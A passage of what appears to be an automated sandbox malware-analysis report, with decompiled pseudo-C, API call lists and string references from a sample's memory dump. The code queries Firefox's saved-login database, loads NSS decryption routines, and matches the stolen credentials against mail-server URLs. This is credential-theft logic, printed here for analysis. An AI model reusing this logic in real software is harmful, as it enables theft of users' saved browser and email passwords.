                                                                                                                                                                        								_v64(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v72);
                                                                                                                                                                        								_t261 = _t261 + 0x14;
                                                                                                                                                                        							}
                                                                                                                                                                        							L11:
                                                                                                                                                                        							if(_v60 == _t208) {
                                                                                                                                                                        								_t133 = 0xffff;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t133 = _v60(_a8);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_t133 != 0x64) {
                                                                                                                                                                        								goto L36;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v9372 = _t208;
                                                                                                                                                                        							memset( &_v9371, _t208, 0x3ff);
                                                                                                                                                                        							memset( &_v8348, _t208, 0x1400);
                                                                                                                                                                        							_t262 = _t261 + 0x18;
                                                                                                                                                                        							_t254 = E0040FE97( &_v68, _a8, 1);
                                                                                                                                                                        							_t246 = E0040FE97( &_v68, _a8, 6);
                                                                                                                                                                        							_v8 = E0040FE97( &_v68, _a8, 7);
                                                                                                                                                                        							_v20 = E0040FE97( &_v68, _a8, 4);
                                                                                                                                                                        							_v24 = E0040FE97( &_v68, _a8, 5);
                                                                                                                                                                        							_v16 = E0040FE97( &_v68, _a8, 2);
                                                                                                                                                                        							if(_t254 != _t208) {
                                                                                                                                                                        								strcpy( &_v9372, _t254);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_t246 != _t208) {
                                                                                                                                                                        								strcpy( &_v8348, _t246);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v8 != _t208) {
                                                                                                                                                                        								strcpy( &_v7324, _v8);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v20 != _t208) {
                                                                                                                                                                        								strcpy( &_v6300, _v20);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v24 != _t208) {
                                                                                                                                                                        								strcpy( &_v5276, _v24);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v16 != _t208) {
                                                                                                                                                                        								strcpy( &_v4252, _v16);
                                                                                                                                                                        							}
                                                                                                                                                                        							_v332 = _t208;
                                                                                                                                                                        							memset( &_v331, _t208, 0xff);
                                                                                                                                                                        							_v588 = _t208;
                                                                                                                                                                        							memset( &_v587, _t208, 0xff);
                                                                                                                                                                        							_t256 = _a4;
                                                                                                                                                                        							_t261 = _t262 + 0x18;
                                                                                                                                                                        							E0040CF02(_v8, _t256,  &_v588);
                                                                                                                                                                        							E0040CF02(_t246, _t256,  &_v332);
                                                                                                                                                                        							_v8 = _t208;
                                                                                                                                                                        							if( *((intOrPtr*)(_t256 + 0x474)) > _t208) {
                                                                                                                                                                        								_v16 = _t256 + 0x468;
                                                                                                                                                                        								do {
                                                                                                                                                                        									_t247 = E0040DA96(_v8, _v16);
                                                                                                                                                                        									_v3228 = _t208;
                                                                                                                                                                        									memset( &_v3227, _t208, 0x261);
                                                                                                                                                                        									_v1996 = _t208;
                                                                                                                                                                        									memset( &_v1995, _t208, 0x261);
                                                                                                                                                                        									_v2612 = _t208;
                                                                                                                                                                        									memset( &_v2611, _t208, 0x261);
                                                                                                                                                                        									_t84 = _t247 + 0x104; // 0x104
                                                                                                                                                                        									_t258 = _t84;
                                                                                                                                                                        									sprintf( &_v3228, "mailbox://%s", _t258);
                                                                                                                                                                        									sprintf( &_v1996, "imap://%s", _t258);
                                                                                                                                                                        									sprintf( &_v2612, "smtp://%s", _t258);
                                                                                                                                                                        									_t261 = _t261 + 0x48;
                                                                                                                                                                        									_push( &_v4252);
                                                                                                                                                                        									_t179 =  &_v3228;
                                                                                                                                                                        									_push(_t179);
                                                                                                                                                                        									L00412072();
                                                                                                                                                                        									if(_t179 == 0) {
                                                                                                                                                                        										L32:
                                                                                                                                                                        										_t94 = _t247 + 0x204; // 0x204
                                                                                                                                                                        										_t259 = _t94;
                                                                                                                                                                        										_t180 =  &_v332;
                                                                                                                                                                        										_push(_t94);
                                                                                                                                                                        										_push(_t180);
                                                                                                                                                                        										L00412072();
                                                                                                                                                                        										if(_t180 == 0) {
                                                                                                                                                                        											E004060DA(0xff, _t247 + 0x304,  &_v588);
                                                                                                                                                                        											E004060DA(0xff, _t259,  &_v332);
                                                                                                                                                                        											_t208 = 0;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L34;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push( &_v4252);
                                                                                                                                                                        									_t187 =  &_v1996;
                                                                                                                                                                        									_push(_t187);
                                                                                                                                                                        									L00412072();
                                                                                                                                                                        									if(_t187 == 0) {
                                                                                                                                                                        										goto L32;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push( &_v4252);
                                                                                                                                                                        									_t189 =  &_v2612;
                                                                                                                                                                        									_push(_t189);
                                                                                                                                                                        									L00412072();
                                                                                                                                                                        									if(_t189 != 0) {
                                                                                                                                                                        										goto L34;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L32;
                                                                                                                                                                        									L34:
                                                                                                                                                                        									_v8 =  &(_v8[1]);
                                                                                                                                                                        								} while (_v8 <  *((intOrPtr*)(_a4 + 0x474)));
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        							L36:
                                                                                                                                                                        							if(_a8 != _t208 && _v44 != _t208) {
                                                                                                                                                                        								_v44(_a8);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v40 != _t208) {
                                                                                                                                                                        								_v40(_v12);
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L41;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}
                                                                                                                                                                        0x0040d443
                                                                                                                                                                        0x0040d449
                                                                                                                                                                        0x0040d44e
                                                                                                                                                                        0x0040d460
                                                                                                                                                                        0x0040d47f
                                                                                                                                                                        0x0040d488
                                                                                                                                                                        0x0040d495
                                                                                                                                                                        0x0040d499
                                                                                                                                                                        0x0040d49d
                                                                                                                                                                        0x0040d4a6
                                                                                                                                                                        0x0040d4a9
                                                                                                                                                                        0x0040d4bd
                                                                                                                                                                        0x0040d4c0
                                                                                                                                                                        0x0040d4c0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d4c3
                                                                                                                                                                        0x0040d4c6
                                                                                                                                                                        0x0040d4d1
                                                                                                                                                                        0x0040d4c8
                                                                                                                                                                        0x0040d4cb
                                                                                                                                                                        0x0040d4ce
                                                                                                                                                                        0x0040d4d9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d4ec
                                                                                                                                                                        0x0040d4f2
                                                                                                                                                                        0x0040d504
                                                                                                                                                                        0x0040d509
                                                                                                                                                                        0x0040d51e
                                                                                                                                                                        0x0040d52d
                                                                                                                                                                        0x0040d53c
                                                                                                                                                                        0x0040d54c
                                                                                                                                                                        0x0040d55c
                                                                                                                                                                        0x0040d569
                                                                                                                                                                        0x0040d56c
                                                                                                                                                                        0x0040d576
                                                                                                                                                                        0x0040d57c
                                                                                                                                                                        0x0040d57f
                                                                                                                                                                        0x0040d589
                                                                                                                                                                        0x0040d58f
                                                                                                                                                                        0x0040d593
                                                                                                                                                                        0x0040d59f
                                                                                                                                                                        0x0040d5a5
                                                                                                                                                                        0x0040d5a9
                                                                                                                                                                        0x0040d5b5
                                                                                                                                                                        0x0040d5bb
                                                                                                                                                                        0x0040d5bf
                                                                                                                                                                        0x0040d5cb
                                                                                                                                                                        0x0040d5d1
                                                                                                                                                                        0x0040d5d5
                                                                                                                                                                        0x0040d5e1
                                                                                                                                                                        0x0040d5e7
                                                                                                                                                                        0x0040d5f6
                                                                                                                                                                        0x0040d5fc
                                                                                                                                                                        0x0040d60a
                                                                                                                                                                        0x0040d610
                                                                                                                                                                        0x0040d615
                                                                                                                                                                        0x0040d618
                                                                                                                                                                        0x0040d627
                                                                                                                                                                        0x0040d637
                                                                                                                                                                        0x0040d642
                                                                                                                                                                        0x0040d645
                                                                                                                                                                        0x0040d652
                                                                                                                                                                        0x0040d655
                                                                                                                                                                        0x0040d666
                                                                                                                                                                        0x0040d670
                                                                                                                                                                        0x0040d676
                                                                                                                                                                        0x0040d684
                                                                                                                                                                        0x0040d68a
                                                                                                                                                                        0x0040d698
                                                                                                                                                                        0x0040d69e
                                                                                                                                                                        0x0040d6a3
                                                                                                                                                                        0x0040d6a3
                                                                                                                                                                        0x0040d6b6
                                                                                                                                                                        0x0040d6c8
                                                                                                                                                                        0x0040d6da
                                                                                                                                                                        0x0040d6df
                                                                                                                                                                        0x0040d6e8
                                                                                                                                                                        0x0040d6e9
                                                                                                                                                                        0x0040d6ef
                                                                                                                                                                        0x0040d6f0
                                                                                                                                                                        0x0040d6f9
                                                                                                                                                                        0x0040d72d
                                                                                                                                                                        0x0040d72d
                                                                                                                                                                        0x0040d72d
                                                                                                                                                                        0x0040d733
                                                                                                                                                                        0x0040d739
                                                                                                                                                                        0x0040d73a
                                                                                                                                                                        0x0040d73b
                                                                                                                                                                        0x0040d744
                                                                                                                                                                        0x0040d758
                                                                                                                                                                        0x0040d766
                                                                                                                                                                        0x0040d76d
                                                                                                                                                                        0x0040d76d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d744
                                                                                                                                                                        0x0040d701
                                                                                                                                                                        0x0040d702
                                                                                                                                                                        0x0040d708
                                                                                                                                                                        0x0040d709
                                                                                                                                                                        0x0040d712
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d71a
                                                                                                                                                                        0x0040d71b
                                                                                                                                                                        0x0040d721
                                                                                                                                                                        0x0040d722
                                                                                                                                                                        0x0040d72b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d76f
                                                                                                                                                                        0x0040d76f
                                                                                                                                                                        0x0040d778
                                                                                                                                                                        0x0040d784
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d789
                                                                                                                                                                        0x0040d78c
                                                                                                                                                                        0x0040d796
                                                                                                                                                                        0x0040d799
                                                                                                                                                                        0x0040d79d
                                                                                                                                                                        0x0040d7a2
                                                                                                                                                                        0x0040d7a5
                                                                                                                                                                        0x0040d79d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d49d
                                                                                                                                                                        0x0040d413

APIs
  • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
  • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
  • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
  • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
  • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
  • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
  • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
  • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
  • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
• memset.MSVCRT ref: 0040D430
• memset.MSVCRT ref: 0040D449
• MultiByteToWideChar.KERNEL32(00000000,00000000,0040D954,000000FF,?,00000104,00000104,00000000,?,0040D954,?,00000000), ref: 0040D460
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D954,?,00000000), ref: 0040D47F
• memset.MSVCRT ref: 0040D4F2
• memset.MSVCRT ref: 0040D504
• strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D576
• strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D589
• strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D59F
• strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5B5
• strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5CB
• strcpy.MSVCRT(?,0040D954,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5E1
• memset.MSVCRT ref: 0040D5FC
• memset.MSVCRT ref: 0040D610
• memset.MSVCRT ref: 0040D676
• memset.MSVCRT ref: 0040D68A
• memset.MSVCRT ref: 0040D69E
• sprintf.MSVCRT ref: 0040D6B6
• sprintf.MSVCRT ref: 0040D6C8
• sprintf.MSVCRT ref: 0040D6DA
• _stricmp.MSVCRT(?,?), ref: 0040D6F0
• _stricmp.MSVCRT(?,?), ref: 0040D709
• _stricmp.MSVCRT(?,?), ref: 0040D722
                                                                                                                                                                        • _stricmp.MSVCRT(?,00000204), ref: 0040D73B
                                                                                                                                                                        Strings
                                                                                                                                                                        • mailbox://%s, xrefs: 0040D6B0
                                                                                                                                                                        • smtp://%s, xrefs: 0040D6D4
                                                                                                                                                                        • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040D4B5
                                                                                                                                                                        • imap://%s, xrefs: 0040D6C2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$ByteCharCurrentDirectoryLibraryLoadMultiWidestrlen$HandleModule
                                                                                                                                                                        • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                        • API String ID: 2893247534-4245710904
                                                                                                                                                                        • Opcode ID: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                                                                                                                                                                        • Instruction ID: a8d77792ad7cee7e4ffb55223bde2ad9b6e4b2884a1795ffa9bad40f06226133
                                                                                                                                                                        • Opcode Fuzzy Hash: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                                                                                                                                                                        • Instruction Fuzzy Hash: FEC12D72D04119AEDB20DAA5DD859DEB7BCEF04314F1441BBF609F2191DA389E888B58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                        			E0040EB15(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
                                                                                                                                                                        				signed int _v0;
                                                                                                                                                                        				intOrPtr _v4;
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				struct HWND__* _v48;
                                                                                                                                                                        				struct HWND__* _v52;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                        				struct HDC__* _t169;
                                                                                                                                                                        				struct HWND__* _t171;
                                                                                                                                                                        				intOrPtr _t223;
                                                                                                                                                                        				void* _t224;
                                                                                                                                                                        				intOrPtr _t235;
                                                                                                                                                                        				struct HWND__* _t237;
                                                                                                                                                                        				void* _t240;
                                                                                                                                                                        				intOrPtr* _t274;
                                                                                                                                                                        				signed int _t275;
                                                                                                                                                                        				signed int _t276;
                                                                                                                                                                        
                                                                                                                                                                        				_t274 = __esi;
                                                                                                                                                                        				_t276 = _t275 & 0xfffffff8;
                                                                                                                                                                        				E00412360(0x2198, __ecx);
                                                                                                                                                                        				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
                                                                                                                                                                        				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
                                                                                                                                                                        				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
                                                                                                                                                                        				_a20 = GetWindowLongA(_t237, 0xfffffff0);
                                                                                                                                                                        				_a24 = GetWindowLongA(_a4, 0xfffffff0);
                                                                                                                                                                        				_a96 = GetWindowLongA(_t237, 0xffffffec);
                                                                                                                                                                        				_a36 = GetWindowLongA(_a4, 0xffffffec);
                                                                                                                                                                        				GetWindowRect(_t237,  &_a100);
                                                                                                                                                                        				GetWindowRect(_a4,  &_a60);
                                                                                                                                                                        				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
                                                                                                                                                                        				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
                                                                                                                                                                        				_t240 = _a108 - _a100.x;
                                                                                                                                                                        				_a4 = _a4 & 0x00000000;
                                                                                                                                                                        				_a28 = _a68 - _a60.x;
                                                                                                                                                                        				_a76 = _a112 - _a104;
                                                                                                                                                                        				_a40 = _a72 - _a64;
                                                                                                                                                                        				_t169 = GetDC( *(__esi + 4));
                                                                                                                                                                        				_a16 = _t169;
                                                                                                                                                                        				if(_t169 == 0) {
                                                                                                                                                                        					L9:
                                                                                                                                                                        					_v0 = _v0 & 0x00000000;
                                                                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
                                                                                                                                                                        						L12:
                                                                                                                                                                        						_t171 = GetDlgItem( *(_t274 + 4), 1);
                                                                                                                                                                        						_a36 = _t171;
                                                                                                                                                                        						GetWindowRect(_t171,  &_a44);
                                                                                                                                                                        						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
                                                                                                                                                                        						GetClientRect( *(_t274 + 4),  &_a124);
                                                                                                                                                                        						GetWindowRect( *(_t274 + 4),  &_a80);
                                                                                                                                                                        						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                                                                                                                        						GetClientRect( *(_t274 + 4),  &_a80);
                                                                                                                                                                        						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                                                                                                                        					}
                                                                                                                                                                        					_a20 = _a20 | 0x10000000;
                                                                                                                                                                        					_a24 = _a24 | 0x10000000;
                                                                                                                                                                        					_a8 = _a12 + 0x10;
                                                                                                                                                                        					do {
                                                                                                                                                                        						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
                                                                                                                                                                        						_v20 = E0040150C(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
                                                                                                                                                                        						_v44 = E0040150C(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
                                                                                                                                                                        						sprintf( &_a80, "%s:", _v52->i);
                                                                                                                                                                        						_t276 = _t276 + 0xc;
                                                                                                                                                                        						SetWindowTextA(_v48,  &_a80);
                                                                                                                                                                        						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
                                                                                                                                                                        						_v60 = _v60 + 0x14;
                                                                                                                                                                        						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
                                                                                                                                                                        						_v68 = _v68 + 1;
                                                                                                                                                                        					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                                                                                                        					goto L12;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t223 = 0;
                                                                                                                                                                        				_a32 = _a32 & 0;
                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					_t224 = _t223 - _t240;
                                                                                                                                                                        					_a28 = _a28 - _t224;
                                                                                                                                                                        					_a60.x = _a60.x + _t224;
                                                                                                                                                                        					_t240 = _t240 + _t224;
                                                                                                                                                                        					ReleaseDC( *(_t274 + 4), _a16);
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v0 = _a12 + 0x10;
                                                                                                                                                                        				do {
                                                                                                                                                                        					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
                                                                                                                                                                        						_t235 = _a100.x + 0xa;
                                                                                                                                                                        						if(_t235 > _v8) {
                                                                                                                                                                        							_v8 = _t235;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_a16 =  &(_a16->i);
                                                                                                                                                                        					_v16 = _v16 + 0x14;
                                                                                                                                                                        				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                                                                                                        				_t223 = _v8;
                                                                                                                                                                        				goto L8;
                                                                                                                                                                        			}
                                                                                                                                                                        0x0040eb15
                                                                                                                                                                        0x0040eb18
                                                                                                                                                                        0x0040eb20
                                                                                                                                                                        0x0040eb3e
                                                                                                                                                                        0x0040eb4c
                                                                                                                                                                        0x0040eb59
                                                                                                                                                                        0x0040eb65
                                                                                                                                                                        0x0040eb6e
                                                                                                                                                                        0x0040eb7a
                                                                                                                                                                        0x0040eb86
                                                                                                                                                                        0x0040eb90
                                                                                                                                                                        0x0040eb9b
                                                                                                                                                                        0x0040ebaf
                                                                                                                                                                        0x0040ebbd
                                                                                                                                                                        0x0040ebce
                                                                                                                                                                        0x0040ebd2
                                                                                                                                                                        0x0040ebd7
                                                                                                                                                                        0x0040ebe6
                                                                                                                                                                        0x0040ebf2
                                                                                                                                                                        0x0040ebf6
                                                                                                                                                                        0x0040ebfe
                                                                                                                                                                        0x0040ec02
                                                                                                                                                                        0x0040ec9a
                                                                                                                                                                        0x0040ec9d
                                                                                                                                                                        0x0040eca9
                                                                                                                                                                        0x0040edb7
                                                                                                                                                                        0x0040edbc
                                                                                                                                                                        0x0040edc8
                                                                                                                                                                        0x0040edcc
                                                                                                                                                                        0x0040edda
                                                                                                                                                                        0x0040edf1
                                                                                                                                                                        0x0040edfb
                                                                                                                                                                        0x0040ee41
                                                                                                                                                                        0x0040ee4b
                                                                                                                                                                        0x0040ee8a
                                                                                                                                                                        0x0040ee8a
                                                                                                                                                                        0x0040ecba
                                                                                                                                                                        0x0040eccb
                                                                                                                                                                        0x0040eccf
                                                                                                                                                                        0x0040ecd3
                                                                                                                                                                        0x0040ecdb
                                                                                                                                                                        0x0040ed0d
                                                                                                                                                                        0x0040ed3d
                                                                                                                                                                        0x0040ed54
                                                                                                                                                                        0x0040ed59
                                                                                                                                                                        0x0040ed68
                                                                                                                                                                        0x0040ed86
                                                                                                                                                                        0x0040ed97
                                                                                                                                                                        0x0040ed9c
                                                                                                                                                                        0x0040eda0
                                                                                                                                                                        0x0040edab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ecd3
                                                                                                                                                                        0x0040ec0b
                                                                                                                                                                        0x0040ec0d
                                                                                                                                                                        0x0040ec17
                                                                                                                                                                        0x0040ec1b
                                                                                                                                                                        0x0040ec81
                                                                                                                                                                        0x0040ec85
                                                                                                                                                                        0x0040ec8a
                                                                                                                                                                        0x0040ec8e
                                                                                                                                                                        0x0040ec92
                                                                                                                                                                        0x0040ec94
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ec94
                                                                                                                                                                        0x0040ec24
                                                                                                                                                                        0x0040ec28
                                                                                                                                                                        0x0040ec4f
                                                                                                                                                                        0x0040ec58
                                                                                                                                                                        0x0040ec5f
                                                                                                                                                                        0x0040ec61
                                                                                                                                                                        0x0040ec61
                                                                                                                                                                        0x0040ec5f
                                                                                                                                                                        0x0040ec65
                                                                                                                                                                        0x0040ec70
                                                                                                                                                                        0x0040ec75
                                                                                                                                                                        0x0040ec7d
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                                                                                        • API String ID: 1703216249-3046471546
                                                                                                                                                                        • Opcode ID: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                                                                                                                                                                        • Instruction ID: 954468ae603e5140b8f73852e098bd997e11b992376cfaf7be677857a6fc3954
                                                                                                                                                                        • Opcode Fuzzy Hash: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                                                                                                                                                                        • Instruction Fuzzy Hash: AAB1EF71108341AFD710DF69C985E6BBBE9FF88704F008A2DF699922A0DB75E914CF16
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E0040E197(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
                                                                                                                                                                        				char _v0;
                                                                                                                                                                        				struct HWND__* _v4;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* _t44;
                                                                                                                                                                        				void* _t58;
                                                                                                                                                                        				int _t59;
                                                                                                                                                                        				int _t61;
                                                                                                                                                                        				int _t62;
                                                                                                                                                                        				long _t66;
                                                                                                                                                                        				struct HWND__* _t93;
                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                        				unsigned int _t125;
                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                        				signed int _t128;
                                                                                                                                                                        				void* _t134;
                                                                                                                                                                        
                                                                                                                                                                        				_t128 = _t127 & 0xfffffff8;
                                                                                                                                                                        				E00412360(0x1424, __ecx);
                                                                                                                                                                        				_t44 = _a8 - 0x110;
                                                                                                                                                                        				if(_t44 == 0) {
                                                                                                                                                                        					E0040649B(__edx, _a4);
                                                                                                                                                                        					 *_t128 = 0x7ff;
                                                                                                                                                                        					_a3104 = 0;
                                                                                                                                                                        					memset( &_a3105, 0, ??);
                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                        					asm("movsd");
                                                                                                                                                                        					asm("movsw");
                                                                                                                                                                        					memset( &_a10, 0, 0xfb);
                                                                                                                                                                        					_a520 = 0;
                                                                                                                                                                        					memset( &_a521, 0, 0xff);
                                                                                                                                                                        					_a264 = 0;
                                                                                                                                                                        					memset( &_a265, 0, 0xff);
                                                                                                                                                                        					_a1056 = 0;
                                                                                                                                                                        					memset( &_a1057, 0, 0x3ff);
                                                                                                                                                                        					_a2080 = 0;
                                                                                                                                                                        					memset( &_a2081, 0, 0x3ff);
                                                                                                                                                                        					_t134 = _t128 + 0x48;
                                                                                                                                                                        					_t58 = GetCurrentProcess();
                                                                                                                                                                        					_t102 =  &_a520;
                                                                                                                                                                        					_v4 = _t58;
                                                                                                                                                                        					_t59 = ReadProcessMemory(_t58,  *0x417c64,  &_a520, 0x80, 0);
                                                                                                                                                                        					__eflags = _t59;
                                                                                                                                                                        					if(_t59 != 0) {
                                                                                                                                                                        						E004065B4( &_a1056,  &_a520, 4);
                                                                                                                                                                        						_pop(_t102);
